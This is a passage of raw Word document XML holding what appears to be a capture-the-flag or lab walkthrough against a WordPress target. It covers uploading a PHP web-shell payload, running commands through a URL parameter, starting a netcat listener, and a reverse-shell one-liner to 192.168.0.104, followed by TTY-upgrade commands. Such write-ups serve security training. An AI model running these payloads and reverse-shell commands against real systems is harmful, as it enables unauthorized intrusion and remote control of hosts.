              <w:t xml:space="preserve">and then </w:t>
            </w:r>
            <w:r w:rsidR="009D4B58" w:rsidRPr="009D4B58">
              <w:t>run the exploit to obtain a shell session</w:t>
            </w:r>
            <w:r w:rsidRPr="007C2607">
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46435535" w14:textId="03D6136F" w:rsidR="007C2607" w:rsidRPr="00FD6D45" w:rsidRDefault="00443380" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00443380">
              <w:rPr>
                <w:b/>
                <w:noProof/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46B4451E" wp14:editId="13068117">
                  <wp:extent cx="4819650" cy="1438275"/>
                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                  <wp:docPr id="1107656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64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5E5D6" w14:textId="77777777" w:rsidR="00FD6D45" w:rsidRDefault="00FD6D45" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6FD12F71" w14:textId="5F9EDC71" w:rsidR="00443380" w:rsidRDefault="00443380" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278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lastRenderedPageBreak/>
              <w:t>Now we will run it using Firefox.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6399FAFB" w14:textId="5A7EBF64" w:rsidR="00443380" w:rsidRDefault="00443380" w:rsidP="00443380">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00443380">
              <w:rPr>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C85C9C2" wp14:editId="1EF6B64F">
                  <wp:extent cx="4749800" cy="537210"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="171055709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0" cy="53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BCFCA8" w14:textId="7ED795A2" w:rsidR="00443380" w:rsidRPr="00443380" w:rsidRDefault="00443380" w:rsidP="00443380">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Step 7: - </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Now we will upload the </w:t>
            </w:r>
            <w:r w:rsidR="0043573A">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>basic php payload to exploit file-vulnerability.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="734EA49F" w14:textId="2EB05191" w:rsidR="00443380" w:rsidRDefault="00443380" w:rsidP="00443380">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00443380">
              <w:rPr>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68252022" wp14:editId="26C6E284">
                  <wp:extent cx="4505325" cy="1651000"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="6350"/>
                  <wp:docPr id="767714737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325" cy="165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8E683F" w14:textId="03DE1274" w:rsidR="0043573A" w:rsidRDefault="0043573A" w:rsidP="00443380">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0043573A">
              <w:rPr>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7976B139" wp14:editId="73486160">
                  <wp:extent cx="4398645" cy="1579419"/>
                  <wp:effectExtent l="0" t="0" r="1905" b="1905"/>
                  <wp:docPr id="1519486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4868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7850" cy="1582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99B0E" w14:textId="4360B8C7" w:rsidR="00CC52EF" w:rsidRDefault="00CC52EF" w:rsidP="00443380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You can pick anyone of your choice and here is the payload of this php file.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64EE7FF4" w14:textId="48777EB4" w:rsidR="00CC52EF" w:rsidRDefault="00CC52EF" w:rsidP="00443380">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC52EF">
              <w:rPr>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B44ACF0" wp14:editId="01C8DDB5">
                  <wp:extent cx="4620491" cy="2047875"/>
                  <wp:effectExtent l="0" t="0" r="8890" b="0"/>
                  <wp:docPr id="1291332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3320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656" cy="2049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6D59A" w14:textId="69AECE85" w:rsidR="00CC52EF" w:rsidRDefault="00CC52EF" w:rsidP="00443380">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6528066D" w14:textId="414B6BC8" w:rsidR="00CC52EF" w:rsidRDefault="00CC52EF" w:rsidP="00443380">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC52EF">
              <w:rPr>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05729DCB" wp14:editId="30A54B73">
                  <wp:extent cx="4505325" cy="952500"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                  <wp:docPr id="12432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212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CE3BE" w14:textId="4374457C" w:rsidR="00925902" w:rsidRDefault="00925902" w:rsidP="00443380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 xml:space="preserve">We have seen in the previous wpScan there was upload directory we will go there and see if our payload has upload or not. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C3B6B04" w14:textId="01ECBE3F" w:rsidR="00925902" w:rsidRDefault="00925902" w:rsidP="00443380">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00925902">
              <w:rPr>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="724B17A1" wp14:editId="5730F079">
                  <wp:extent cx="4674870" cy="2075180"/>
                  <wp:effectExtent l="0" t="0" r="0" b="1270"/>
                  <wp:docPr id="334990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9905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07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95A8F" w14:textId="53D4C52A" w:rsidR="00925902" w:rsidRDefault="00925902" w:rsidP="00443380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As you can see below our payload now we just have to check it that it will run or not.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16A0652D" w14:textId="0AB23A30" w:rsidR="00925902" w:rsidRDefault="00925902" w:rsidP="00443380">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00925902">
              <w:rPr>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10552A4A" wp14:editId="59EF9C0E">
                  <wp:extent cx="4762500" cy="2270125"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="605710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71079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27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52AA3" w14:textId="4C41AAB9" w:rsidR="002F129A" w:rsidRPr="002F129A" w:rsidRDefault="00925902" w:rsidP="00443380">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Step 8: -</w:t>
            </w:r>
            <w:r w:rsidRPr="002F129A">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">After selecting our payload we will put “?” Infront of the pay load in URL and put some commands to check if it is running or </w:t>
            </w:r>
            <w:r w:rsidR="002F129A" w:rsidRPr="002F129A">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>not. I have put “</w:t>
            </w:r>
            <w:r w:rsidR="002F129A" w:rsidRPr="002F129A">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>ls -lshat /”</w:t>
            </w:r>
            <w:r w:rsidR="002F129A">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00675449" w:rsidRPr="00675449">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>This command lists all files in the root directory, including hidden files</w:t>
            </w:r>
            <w:r w:rsidR="002F129A" w:rsidRPr="002F129A">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="002F129A" w:rsidRPr="00675449">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>in a detailed format, show the disk blocks used, display sizes in a human-readable format, and sort the entries by the most recently modified first.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="565A209D" w14:textId="77777777" w:rsidR="00925902" w:rsidRDefault="00925902" w:rsidP="00443380">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="113FDAB9" w14:textId="58BF1959" w:rsidR="00925902" w:rsidRPr="00925902" w:rsidRDefault="002F129A" w:rsidP="00925902">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F129A">
              <w:rPr>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="363C4F4A" wp14:editId="57907587">
                  <wp:extent cx="4855845" cy="784860"/>
                  <wp:effectExtent l="0" t="0" r="1905" b="0"/>
                  <wp:docPr id="1737781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78195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5845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981C7" w14:textId="63CA579B" w:rsidR="00925902" w:rsidRDefault="00925902" w:rsidP="00443380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 xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="005626F1" w:rsidRPr="005626F1">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>The uploaded payload executed successfully.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FB3C849" w14:textId="46A1AEBF" w:rsidR="00925902" w:rsidRPr="00443380" w:rsidRDefault="002F129A" w:rsidP="00443380">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F129A">
              <w:rPr>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43B9A9D5" wp14:editId="37E63204">
                  <wp:extent cx="4869180" cy="2672080"/>
                  <wp:effectExtent l="0" t="0" r="7620" b="0"/>
                  <wp:docPr id="404628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62871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180" cy="267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50519" w14:textId="17F73862" w:rsidR="006B4AF9" w:rsidRPr="008045A5" w:rsidRDefault="002F129A" w:rsidP="008045A5">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">Step </w:t>
            </w:r>
            <w:r w:rsidR="007B7977">
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>9: -</w:t>
            </w:r>
            <w:r w:rsidR="007B7977" w:rsidRPr="006B4AF9">
              <w:rPr>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">Now we will </w:t>
            </w:r>
            <w:r w:rsidR="006B4AF9" w:rsidRPr="006B4AF9">
              <w:rPr>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>open</w:t>
            </w:r>
            <w:r w:rsidR="008045A5">
              <w:rPr>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="008045A5" w:rsidRPr="008045A5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Netcat Listener</w:t>
            </w:r>
            <w:r w:rsidR="008045A5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="006B4AF9" w:rsidRPr="008045A5">
              <w:rPr>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>on port</w:t>
            </w:r>
            <w:r w:rsidR="006B4AF9">
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1</w:t>
            </w:r>
            <w:r w:rsidR="008045A5">
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57940CFC" w14:textId="217709A4" w:rsidR="006B4AF9" w:rsidRDefault="006B4AF9" w:rsidP="006B4AF9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#</w:t>
            </w:r>
            <w:r w:rsidRPr="006B4AF9">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">nc -lvnp </w:t>
            </w:r>
            <w:r w:rsidR="008045A5">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="422864BE" w14:textId="77777777" w:rsidR="008045A5" w:rsidRDefault="008045A5" w:rsidP="006B4AF9">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008045A5">
              <w:rPr>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62C79336" wp14:editId="1D675D67">
                  <wp:extent cx="3029373" cy="523948"/>
                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                  <wp:docPr id="862491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49107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98AD8" w14:textId="1E576F94" w:rsidR="008045A5" w:rsidRPr="00082513" w:rsidRDefault="008045A5" w:rsidP="008045A5">
            <w:pPr>
              <w:spacing w:after="160"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Step 10: - </w:t>
            </w:r>
            <w:r w:rsidRPr="008045A5">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>After starting</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="008045A5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Netcat Listener</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">we will </w:t>
            </w:r>
            <w:r w:rsidRPr="008045A5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Execute Reverse Shell</w:t>
            </w:r>
            <w:r w:rsidR="00DB7596">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidR="00DB7596" w:rsidRPr="00082513">
              <w:t>in this command we have to put our</w:t>
            </w:r>
            <w:r w:rsidR="00082513" w:rsidRPr="00082513">
              <w:t xml:space="preserve"> IP-Address</w:t>
            </w:r>
            <w:r w:rsidR="00082513">
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4205BC1D" w14:textId="2F0DC742" w:rsidR="00DB7596" w:rsidRPr="008045A5" w:rsidRDefault="00DB7596" w:rsidP="008045A5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  <w:r w:rsidRPr="00DB7596">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> bash -c 'bash -i &gt;&amp; /dev/tcp/192.168.0.104/1 0&gt;&amp;1'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79E7C4E2" w14:textId="07825FE2" w:rsidR="008045A5" w:rsidRPr="008045A5" w:rsidRDefault="00DB7596" w:rsidP="006B4AF9">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00DB7596">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FA51E05" wp14:editId="6C7D7324">
                  <wp:extent cx="5044877" cy="510584"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
                  <wp:docPr id="1006987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98721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877" cy="51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28C50" w14:textId="09C16289" w:rsidR="002F129A" w:rsidRDefault="00DB7596" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DB7596">
              <w:rPr>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Now we will encode this bash command using</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> Meyer</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB7596">
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>web</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00082513">
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>or CyberChef</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="155D4DF7" w14:textId="77777777" w:rsidR="00DB7596" w:rsidRDefault="00DB7596" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DB7596">
              <w:rPr>
                <w:b/>
                <w:noProof/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32732303" wp14:editId="43E7B72D">
                  <wp:extent cx="4973320" cy="2521527"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1154565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56537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813" cy="2586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B0F62" w14:textId="77777777" w:rsidR="00082513" w:rsidRDefault="00082513" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00082513">
              <w:rPr>
                <w:b/>
                <w:noProof/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59AFDFA4" wp14:editId="4E65ACD0">
                  <wp:extent cx="4987636" cy="910590"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
                  <wp:docPr id="1180747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74709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2944" cy="911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CC9D0" w14:textId="77777777" w:rsidR="00074908" w:rsidRPr="00074908" w:rsidRDefault="00082513" w:rsidP="00074908">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">Step 11: - </w:t>
            </w:r>
            <w:r w:rsidR="00074908" w:rsidRPr="00074908">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>A reverse shell was obtained. Since it was a non-interactive shell, it was upgraded to a fully interactive TTY shell using Python.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72535C5C" w14:textId="43973230" w:rsidR="00082513" w:rsidRDefault="00082513" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="040FFECE" w14:textId="3BDB2801" w:rsidR="00BB794E" w:rsidRPr="00BB794E" w:rsidRDefault="00BB794E" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">1 </w:t>
            </w:r>
            <w:r w:rsidRPr="00BB794E">
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB794E">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BB794E">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>python3 -c 'import pty; pty.spawn("/bin/bash")'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A5D4779" w14:textId="77777777" w:rsidR="002F7043" w:rsidRDefault="00BB794E" w:rsidP="00FD6D45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 xml:space="preserve">2 </w:t>
            </w:r>
            <w:r w:rsidRPr="00BB794E">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t># export</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BB794E">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45BEEDE3" w14:textId="66A45BA9" w:rsidR="00BB794E" w:rsidRDefault="00BB794E" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB794E">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>/bin:/usr/games:/tmp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="726989DA" w14:textId="0F6F6D61" w:rsidR="00BB794E" w:rsidRDefault="00BB794E" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>3 #</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB794E">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BB794E">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>export TERM=xterm-256color</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="151228ED" w14:textId="65191CB6" w:rsidR="00BB794E" w:rsidRDefault="00BB794E" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>4 #</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB794E">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BB794E">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>alias ll='clear ; ls -lsaht --color=auto'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="008C7C34" w14:textId="4262D884" w:rsidR="00BB794E" w:rsidRDefault="00BB794E" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>5 #</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB794E">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BB794E">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Ctrl + Z</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16F94980" w14:textId="59B0AD46" w:rsidR="00BB794E" w:rsidRDefault="00BB794E" w:rsidP="00FD6D45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>6 #</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB794E">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BB794E">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>stty raw -echo ; fg ; reset</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB794E">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>7 #</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB794E">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>stty columns 200 rows 200</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B86488E" w14:textId="7B4B16F2" w:rsidR="00BB794E" w:rsidRPr="00BB794E" w:rsidRDefault="00BB794E" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB794E">
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>These are the steps you must follow to create a proper shell</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CFC3D63" w14:textId="4A23A3E4" w:rsidR="00BB794E" w:rsidRPr="00BB794E" w:rsidRDefault="00BB794E" w:rsidP="00BB794E">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB794E">
              <w:rPr>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F633BDC" wp14:editId="6F23F8D6">
                  <wp:extent cx="5063837" cy="2825750"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="0"/>
                  <wp:docPr id="6666506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3068" cy="2836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0D6FA" w14:textId="77777777" w:rsidR="00BB794E" w:rsidRDefault="002F7043" w:rsidP="00FD6D45">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F7043">
              <w:rPr>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56CD7890" wp14:editId="06B45474">
                  <wp:extent cx="5036127" cy="868680"/>
                  <wp:effectExtent l="0" t="0" r="0" b="7620"/>
                  <wp:docPr id="1329928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92880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397" cy="869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1DE96" w14:textId="77777777" w:rsidR="002F7043" w:rsidRDefault="002F7043" w:rsidP="002F7043">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3505AC14" w14:textId="77777777" w:rsidR="002F7043" w:rsidRDefault="002F7043" w:rsidP="002F7043">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="381B8ED1" w14:textId="35A74A77" w:rsidR="002F7043" w:rsidRPr="002F7043" w:rsidRDefault="002F7043" w:rsidP="002F7043"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>#</w:t>
            </w:r>
            <w:r w:rsidRPr="002F7043">
              <w:rPr>
